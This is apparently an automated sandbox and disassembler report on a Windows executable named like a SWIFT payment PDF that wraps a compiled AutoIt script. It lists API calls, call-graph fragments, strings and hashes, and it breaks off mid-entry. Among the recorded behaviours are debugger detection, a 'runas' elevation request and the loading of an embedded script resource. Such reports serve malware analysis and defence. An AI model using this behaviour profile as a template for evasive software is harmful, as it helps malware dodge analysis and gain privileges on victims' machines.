96388->96344 96390 924517 83 API calls 96389->96390 96391 96c405 96390->96391 96392 96c56d 94 API calls 96391->96392 96393 96c417 96392->96393 96394 96c41b 96393->96394 96395 9244ed 64 API calls 96393->96395 96394->96360 96394->96361 96396 96c432 96395->96396 96397 9244ed 64 API calls 96396->96397 96398 96c442 96397->96398 96399 9244ed 64 API calls 96398->96399 96400 96c45d 96399->96400 96401 9244ed 64 API calls 96400->96401 96402 96c478 96401->96402 96403 924517 83 API calls 96402->96403 96404 96c48f 96403->96404 96405 94395c __crtGetStringTypeA_stat 47 API calls 96404->96405 96406 96c496 96405->96406 96407 94395c 
__crtGetStringTypeA_stat 47 API calls 96406->96407 96408 96c4a0 96407->96408 96409 9244ed 64 API calls 96408->96409 96410 96c4b4 96409->96410 96411 96bf5a GetSystemTimeAsFileTime 96410->96411 96412 96c4c7 96411->96412 96413 96c4f1 96412->96413 96414 96c4dc 96412->96414 96416 96c556 96413->96416 96417 96c4f7 96413->96417 96415 941c9d _free 47 API calls 96414->96415 96418 96c4e2 96415->96418 96420 941c9d _free 47 API calls 96416->96420 96419 96b965 118 API calls 96417->96419 96421 941c9d _free 47 API calls 96418->96421 96422 96c54e 96419->96422 96420->96394 96421->96394 96423 941c9d _free 47 API calls 96422->96423 96423->96394 96424->96382 96425->96384 96426->96381 96428 94f8a0 __ftell_nolock 96427->96428 96429 9240b4 GetLongPathNameW 96428->96429 96430 926a63 48 API calls 96429->96430 96431 9240dc 96430->96431 96432 9249a0 96431->96432 96433 92d7f7 48 API calls 96432->96433 96434 9249b2 96433->96434 96435 92660f 49 API calls 96434->96435 96436 9249bd 96435->96436 96437 9249c8 96436->96437 96438 992e35 96436->96438 96439 9264cf 48 API calls 96437->96439 96443 992e4f 96438->96443 96485 93d35e 60 API calls 96438->96485 96441 9249d4 96439->96441 96485->96438 96633 1027298 96647 1024ee8 96633->96647 96635 1027362 96650 1027188 96635->96650 96649 1025573 96647->96649 96653 1028388 GetPEB 96647->96653 96649->96635 96651 1027191 Sleep 96650->96651 96652 102719f 96651->96652 96653->96649 96654 999c06 96665 93d3be 96654->96665 96656 999c1c 96658 999c91 Mailbox 96656->96658 96674 921caa 49 API calls 96656->96674 96659 933200 331 API calls 96658->96659 96660 999cc5 96659->96660 96664 99a7ab Mailbox 96660->96664 96676 96cc5c 86 API calls 4 library calls 96660->96676 96662 999c71 96662->96660 96675 96b171 48 API calls 96662->96675 96666 93d3ca 96665->96666 96667 93d3dc 96665->96667 96677 92dcae 50 API calls Mailbox 96666->96677 96669 93d3e2 96667->96669 96670 93d40b 96667->96670 96671 93f4ea 48 API calls 96669->96671 96678 92dcae 50 API calls Mailbox 96670->96678 96673 93d3d4 
96671->96673 96673->96656 96674->96662 96675->96658 96676->96664 96677->96673 96678->96673

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 22f4cde1c851320073b242ecc501b3aa2cdd3ad1772a6924fc26c584c213ffa6
                                                                                    • Instruction ID: c3b02a0f04cfbf8420b06dec10c801b8d87c9e10b6d845645b200eed060cb753
                                                                                    • Opcode Fuzzy Hash: 22f4cde1c851320073b242ecc501b3aa2cdd3ad1772a6924fc26c584c213ffa6
                                                                                    • Instruction Fuzzy Hash: 79325B75B162288FDB24CF54DC81AE9B7B9FF4A314F1841D9E40AA7A91D7309E80CF52

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00923AA3,?), ref: 00923D45
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00923AA3,?), ref: 00923D57
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,009E1148,009E1130,?,?,?,?,00923AA3,?), ref: 00923DC8
                                                                                      • Part of subcall function 00926430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00923DEE,009E1148,?,?,?,?,?,00923AA3,?), ref: 00926471
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00923AA3,?), ref: 00923E48
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009D28F4,00000010), ref: 00991CCE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,009E1148,?,?,?,?,?,00923AA3,?), ref: 00991D06
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009BDAB4,009E1148,?,?,?,?,?,00923AA3,?), ref: 00991D89
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00923AA3), ref: 00991D90
                                                                                      • Part of subcall function 00923E6E: GetSysColorBrush.USER32(0000000F), ref: 00923E79
                                                                                      • Part of subcall function 00923E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00923E88
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(00000063), ref: 00923E9E
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(000000A4), ref: 00923EB0
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(000000A2), ref: 00923EC2
                                                                                      • Part of subcall function 00923E6E: RegisterClassExW.USER32(?), ref: 00923F30
                                                                                      • Part of subcall function 009236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009236E6
                                                                                      • Part of subcall function 009236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923707
                                                                                      • Part of subcall function 009236B8: ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 0092371B
                                                                                      • Part of subcall function 009236B8: ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 00923724
                                                                                      • Part of subcall function 00924FFC: _memset.LIBCMT ref: 00925022
                                                                                      • Part of subcall function 00924FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009250CB
                                                                                    Strings
                                                                                    • runas, xrefs: 00991D84
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 00991CC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 438480954-3287110873
                                                                                    • Opcode ID: 4a54a366689267ba1128ffb557468832881cca407ecad2a7182f8b985e778feb
                                                                                    • Instruction ID: 05693c2623decfaef2de73cafe1d556409372fc7862fc004faad6f2177a24ac9
                                                                                    • Opcode Fuzzy Hash: 4a54a366689267ba1128ffb557468832881cca407ecad2a7182f8b985e778feb
                                                                                    • Instruction Fuzzy Hash: B8514B30D0C295ABCF11ABB0FC81FED7B79AF95704F008029F102661AADA784E49DB21

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 1079 93ddc0-93de4f call 92d7f7 GetVersionExW call 926a63 call 93dfb4 call 926571 1088 9924c8-9924cb 1079->1088 1089 93de55-93de56 1079->1089 1092 9924cd 1088->1092 1093 9924e4-9924e8 1088->1093 1090 93de92-93dea2 call 93df77 1089->1090 1091 93de58-93de63 1089->1091 1110 93dec7-93dee1 1090->1110 1111 93dea4-93dec1 GetCurrentProcess call 93df5f 1090->1111 1094 99244e-992454 1091->1094 1095 93de69-93de6b 1091->1095 1097 9924d0 1092->1097 1098 9924ea-9924f3 1093->1098 1099 9924d3-9924dc 1093->1099 1103 99245e-992464 1094->1103 1104 992456-992459 1094->1104 1100 992469-992475 1095->1100 1101 93de71-93de74 1095->1101 1097->1099 1098->1097 1105 9924f5-9924f8 1098->1105 1099->1093 1106 99247f-992485 1100->1106 1107 992477-99247a 1100->1107 1108 93de7a-93de89 1101->1108 1109 992495-992498 1101->1109 1103->1090 1104->1090 1105->1099 1106->1090 1107->1090 1114 99248a-992490 1108->1114 1115 93de8f 1108->1115 1109->1090 1116 99249e-9924b3 1109->1116 1112 93dee3-93def7 call 93e00c 1110->1112 1113 93df31-93df3b GetSystemInfo 1110->1113 1111->1110 1131 93dec3 1111->1131 1126 93df29-93df2f GetSystemInfo 1112->1126 1127 93def9-93df01 call 93dff4 GetNativeSystemInfo 1112->1127 1122 93df0e-93df1a 1113->1122 1114->1090 1115->1090 1119 9924bd-9924c3 1116->1119 1120 9924b5-9924b8 1116->1120 1119->1090 1120->1090 1124 93df21-93df26 1122->1124 1125 93df1c-93df1f FreeLibrary 1122->1125 1125->1124 1130 93df03-93df07 1126->1130 1127->1130 1130->1122 1133 93df09-93df0c FreeLibrary 1130->1133 1131->1110 1133->1122
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0093DDEC
                                                                                    • GetCurrentProcess.KERNEL32(00000000,009BDC38,?,?), ref: 0093DEAC
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,009BDC38,?,?), ref: 0093DF01
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0093DF0C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0093DF1F
                                                                                    • GetSystemInfo.KERNEL32(?,009BDC38,?,?), ref: 0093DF29
                                                                                    • GetSystemInfo.KERNEL32(?,009BDC38,?,?), ref: 0093DF35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                    • String ID:
                                                                                    • API String ID: 3851250370-0
                                                                                    • Opcode ID: 9380643a0b59a06fe3bc1d96a46a00ed4221e2b08206121d84d36a4a03c5ddbb
                                                                                    • Instruction ID: 2c5d060f2b30dc0c44a116bf2d90e4674438b6f29d3dda2afc4ed2dff6be6e0a
                                                                                    • Opcode Fuzzy Hash: 9380643a0b59a06fe3bc1d96a46a00ed4221e2b08206121d84d36a4a03c5ddbb
                                                                                    • Instruction Fuzzy Hash: 206181B181A384DBCF15CF68A8C15ED7FB86F6A300F1949D9D8459F247C6388A09CF65

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 1151 92406b-924083 CreateStreamOnHGlobal 1152 9240a3-9240a6 1151->1152 1153 924085-92409c FindResourceExW 1151->1153 1154 9240a2 1153->1154 1155 994f16-994f25 LoadResource 1153->1155 1154->1152 1155->1154 1156 994f2b-994f39 SizeofResource 1155->1156 1156->1154 1157 994f3f-994f4a LockResource 1156->1157 1157->1154 1158 994f50-994f58 1157->1158 1159 994f5c-994f6e 1158->1159 1159->1154
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0092449E,?,?,00000000,00000001), ref: 0092407B
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0092449E,?,?,00000000,00000001), ref: 00924092
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB), ref: 00994F1A
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB), ref: 00994F2F
                                                                                    • LockResource.KERNEL32(0092449E,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB,00000000), ref: 00994F42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 7822eb205cee0e2762eea8bde81ae154bc12edd4af96a64233420a894b34ef94
                                                                                    • Instruction ID: e7847c009ad3d4607081099f9689c4afcab45d6ce582476db7156217bfeabbd1
                                                                                    • Opcode Fuzzy Hash: 7822eb205cee0e2762eea8bde81ae154bc12edd4af96a64233420a894b34ef94
                                                                                    • Instruction Fuzzy Hash: 0A115A70244711AFE7218B25EC48F677BBDEFCAB51F20412CF6128A6A4DB71DC40DA60
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00992F49), ref: 00966CB9
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00966CCA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00966CDA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 7126df3422095b575aecf11268b57ef1ef32fafdc5fe27766abcb9a1b85ccd60
                                                                                    • Instruction ID: fc78c363cc9dc2eaf521d4866358d17a59f16defa8c0836307545be6b502c86f
                                                                                    • Opcode Fuzzy Hash: 7126df3422095b575aecf11268b57ef1ef32fafdc5fe27766abcb9a1b85ccd60
                                                                                    • Instruction Fuzzy Hash: E2E0D83182981057C2146738EC0D4E9376CDE06339F504706F5F2C11D0EB74ED0096D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: @
                                                                                    • API String ID: 3728558374-2766056989
                                                                                    • Opcode ID: 2c91ffd1503530d795b6cf90a6efd47c88f739eff81a0f010a09933fbe7f56df
                                                                                    • Instruction ID: 29ef3bd3e4382db431920a3d60a936bfdedb70fe5b4b13cc5987cc1befca28b1
                                                                                    • Opcode Fuzzy Hash: 2c91ffd1503530d795b6cf90a6efd47c88f739eff81a0f010a09933fbe7f56df
                                                                                    • Instruction Fuzzy Hash: 9872BD70E042089FDF24DF98C481ABEB7B9EF88300F15C45AE955AB291DB35AE45CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3964851224-0
                                                                                    • Opcode ID: 579063b02ba8da24aa7eb190d961292f19af69c71c4421eb363aaa7a03325b78
                                                                                    • Instruction ID: 829c6bb4f186a33610be0a9860361c9553f5233d67c9439af4f9ae1cdc4eac02
                                                                                    • Opcode Fuzzy Hash: 579063b02ba8da24aa7eb190d961292f19af69c71c4421eb363aaa7a03325b78
                                                                                    • Instruction Fuzzy Hash: AB9276706083419FDB24DF18C484B6ABBE5BF88304F14885DF89A8B2A2D775ED45CF92
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092E959
                                                                                    • timeGetTime.WINMM ref: 0092EBFA
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092ED2E
                                                                                    • TranslateMessage.USER32(?), ref: 0092ED3F
                                                                                    • DispatchMessageW.USER32(?), ref: 0092ED4A
                                                                                    • LockWindowUpdate.USER32(00000000), ref: 0092ED79
                                                                                    • DestroyWindow.USER32 ref: 0092ED85
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0092ED9F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00995270
                                                                                    • TranslateMessage.USER32(?), ref: 009959F7
                                                                                    • DispatchMessageW.USER32(?), ref: 00995A05
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00995A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 2641332412-570651680
                                                                                    • Opcode ID: afb757500c3dfad5553493c9774140082606bfda9c59b7df6f938115bad7e9a3
                                                                                    • Instruction ID: 39fae9e309f5e5ad702f8e0ee34ab06251c0b8acc8e0b9babe946043d8248062
                                                                                    • Opcode Fuzzy Hash: afb757500c3dfad5553493c9774140082606bfda9c59b7df6f938115bad7e9a3
                                                                                    • Instruction Fuzzy Hash: 5962D270508350DFEB25DF28D8C5BAA77E8BF84304F08496DF98A8B296DB75D844CB52
                                                                                    APIs
                                                                                    • ___createFile.LIBCMT ref: 00955EC3
                                                                                    • ___createFile.LIBCMT ref: 00955F04
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00955F2D
                                                                                    • __dosmaperr.LIBCMT ref: 00955F34
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00955F47
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00955F6A
                                                                                    • __dosmaperr.LIBCMT ref: 00955F73
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00955F7C
                                                                                    • __set_osfhnd.LIBCMT ref: 00955FAC
                                                                                    • __lseeki64_nolock.LIBCMT ref: 00956016
                                                                                    • __close_nolock.LIBCMT ref: 0095603C
                                                                                    • __chsize_nolock.LIBCMT ref: 0095606C
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095607E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 00956176
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095618B
                                                                                    • __close_nolock.LIBCMT ref: 009561EB
                                                                                      • Part of subcall function 0094EA9C: CloseHandle.KERNELBASE(00000000,009CEEF4,00000000,?,00956041,009CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0094EAEC
                                                                                      • Part of subcall function 0094EA9C: GetLastError.KERNEL32(?,00956041,009CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0094EAF6
                                                                                      • Part of subcall function 0094EA9C: __free_osfhnd.LIBCMT ref: 0094EB03
                                                                                      • Part of subcall function 0094EA9C: __dosmaperr.LIBCMT ref: 0094EB25
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095620D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00956342
                                                                                    • ___createFile.LIBCMT ref: 00956361
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095636E
                                                                                    • __dosmaperr.LIBCMT ref: 00956375
                                                                                    • __free_osfhnd.LIBCMT ref: 00956395
                                                                                    • __invoke_watson.LIBCMT ref: 009563C3
                                                                                    • __wsopen_helper.LIBCMT ref: 009563DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                    • String ID: @
                                                                                    • API String ID: 3896587723-2766056989
                                                                                    • Opcode ID: 4849a75ade8f7bbbc823cde8889e10a2091c0bdd1c8c176025bd7664df6acb95
                                                                                    • Instruction ID: 5294c87d2eb56b27b6753a91a46743c95a5f7eedc3e79a4d8df99933945b0058
                                                                                    • Opcode Fuzzy Hash: 4849a75ade8f7bbbc823cde8889e10a2091c0bdd1c8c176025bd7664df6acb95
                                                                                    • Instruction Fuzzy Hash: 0A22557190460A9BEF25DF6ACC95BBD7B35EF40326F254228EC219B2E2C7398D48C751

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _wcscpy.LIBCMT ref: 0096FA96
                                                                                    • _wcschr.LIBCMT ref: 0096FAA4
                                                                                    • _wcscpy.LIBCMT ref: 0096FABB
                                                                                    • _wcscat.LIBCMT ref: 0096FACA
                                                                                    • _wcscat.LIBCMT ref: 0096FAE8
                                                                                    • _wcscpy.LIBCMT ref: 0096FB09
                                                                                    • __wsplitpath.LIBCMT ref: 0096FBE6
                                                                                    • _wcscpy.LIBCMT ref: 0096FC0B
                                                                                    • _wcscpy.LIBCMT ref: 0096FC1D
                                                                                    • _wcscpy.LIBCMT ref: 0096FC32
                                                                                    • _wcscat.LIBCMT ref: 0096FC47
                                                                                    • _wcscat.LIBCMT ref: 0096FC59
                                                                                    • _wcscat.LIBCMT ref: 0096FC6E
                                                                                      • Part of subcall function 0096BFA4: _wcscmp.LIBCMT ref: 0096C03E
                                                                                      • Part of subcall function 0096BFA4: __wsplitpath.LIBCMT ref: 0096C083
                                                                                      • Part of subcall function 0096BFA4: _wcscpy.LIBCMT ref: 0096C096
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0A9
                                                                                      • Part of subcall function 0096BFA4: __wsplitpath.LIBCMT ref: 0096C0CE
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0E4
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                    • API String ID: 2955681530-2806939583
                                                                                    • Opcode ID: c110010cf55dfde2366440e2007b8b735926dd01972b763cc10ee4ed4fd6328b
                                                                                    • Instruction ID: 9fee8feb0ff180566ef44b8e2cf3a02686dfa31d905e061b2ccc763481e53ab8
                                                                                    • Opcode Fuzzy Hash: c110010cf55dfde2366440e2007b8b735926dd01972b763cc10ee4ed4fd6328b
                                                                                    • Instruction Fuzzy Hash: 7F919172504705AFCB20EB54D891F9AB3E8BFD4310F04886DF99997291DB34FA48CB92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0096BDB4: __time64.LIBCMT ref: 0096BDBE
                                                                                      • Part of subcall function 00924517: _fseek.LIBCMT ref: 0092452F
                                                                                    • __wsplitpath.LIBCMT ref: 0096C083
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
